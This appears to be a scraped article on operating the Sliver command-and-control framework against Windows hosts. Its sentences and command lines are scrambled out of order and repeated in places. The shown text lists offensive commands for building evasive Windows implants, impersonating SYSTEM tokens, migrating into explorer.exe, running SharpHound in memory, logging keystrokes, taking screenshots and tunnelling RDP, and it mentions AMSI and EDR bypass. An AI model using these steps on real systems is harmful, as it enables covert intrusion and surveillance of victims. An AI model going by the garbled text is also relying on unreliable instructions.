Introduction In the ever-evolving landscape of cybersecurity, offensive security tools are constantly adapting to bypass modern endpoint detection and response (EDR) systems. Among the most powerful frameworks to emerge in recent years is Sliver , an open-source cross-platform command and control (C2) framework developed by BishopFox. Designed as a superior alternative to tools like Cobalt Strike and Metasploit’s meterpreter , Sliver has become a staple for red team operations.
getsystem -name "NT AUTHORITY\SYSTEM" Current token: DESKTOP-ABC123\User -> Impersonating: NT AUTHORITY\SYSTEM The Windows agent captures interaction:
execute-assembly -p SharpHound.exe -c All AMSI Bypass Sliver v4.2.2 includes a built-in AMSI patching module: sliver v4.2.2 windows
screenshot # Saves to /tmp/screenshot.png keystroke -m # Start real-time keystroke logging Sliver v4.2.2 offers multiple persistence mechanisms:
ps # List all Windows processes migrate -p 884 # Migrate into explorer.exe (PID 884) Elevate to SYSTEM without spawning a new process: Basic Windows Executable generate --os windows --arch amd64
.\sliver-server_windows.exe daemon Once the server is running, generate your Windows implant. The core of your operation is the sliver client (implant). For v4.2.2 on Windows, use the generate command with Windows-specific flags. Basic Windows Executable generate --os windows --arch amd64 --format exe --save /tmp/ Advanced Evasion: Staging Payloads To avoid static signatures, use the new staging mechanism:
generate --os windows --static --ldflags "-s -w" Sliver v4.2.2 represents a significant leap forward for Windows-based C2 operations. Its refined process injection, EDR bypass techniques, native token manipulation, and stable beacon mode make it a formidable tool for legitimate red teaming and security research. EDR bypass techniques
portfwd add --remote 127.0.0.1:3389 --bind 0.0.0.0:33890 # RDP tunnel Import .NET tools directly into memory: